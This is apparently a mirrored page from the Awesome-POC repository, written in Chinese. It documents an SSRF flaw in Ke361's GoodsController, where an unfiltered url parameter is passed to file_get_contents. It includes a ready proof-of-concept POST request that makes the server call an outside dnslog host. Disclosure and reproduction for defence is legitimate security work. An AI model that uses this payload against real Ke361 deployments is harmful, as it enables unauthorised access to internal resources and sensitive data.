admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/Ke361 GoodsController.class.php SSRF漏洞.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

35 lines
710 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Ke361 GoodsController.class.php SSRF漏洞
## 漏洞描述
Ke361 GoodsController.class.php URL参数存在 SSRF漏洞通过漏洞可以获取敏感信息
## 漏洞影响
```
Ke361
```
## 环境搭建
https://gitee.com/jcove/ke361
## 漏洞复现
存在漏洞的文件为 `Application/Home/Controller/GoodsController.class.php`
![image-20220518153445715](./images/202205181534788.png)
URL参数无任何过滤传入 file_get_contents函数造成SSRF漏洞构造请求
```
POST /index.php?s=/Goods/ajGetGoodsDetial
url=http://6si2gt.dnslog.cn
```
![image-20220518153459466](./images/202205181534535.png)
dnslog接收到请求
![image-20220518153527567](./images/202205181535619.png)
Reference in New Issue View Git Blame Copy Permalink